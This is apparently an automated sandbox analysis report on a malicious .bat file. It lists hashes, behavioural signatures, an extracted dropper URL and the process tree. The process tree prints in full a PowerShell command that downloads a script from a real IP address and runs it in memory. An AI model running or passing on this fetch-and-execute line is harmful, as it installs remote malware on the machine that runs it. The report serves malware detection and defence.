Analysis
-
max time kernel
62s -
max time network
63s -
platform
windows7_x64 -
resource
win7 -
submitted
02-08-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
21b6d26f5616dbe4b9f07bd5660bb62d.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
21b6d26f5616dbe4b9f07bd5660bb62d.bat
-
Size
215B
-
MD5
d0dba6d8db0dbf8637507b05349fd02f
-
SHA1
e3795cff8728780bd8d72ae5f7e317ee93075e93
-
SHA256
085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
-
SHA512
de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 852 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 852 powershell.exe 852 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 852 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1088 wrote to memory of 852 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 852 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 852 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 852 1088 cmd.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 852 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:852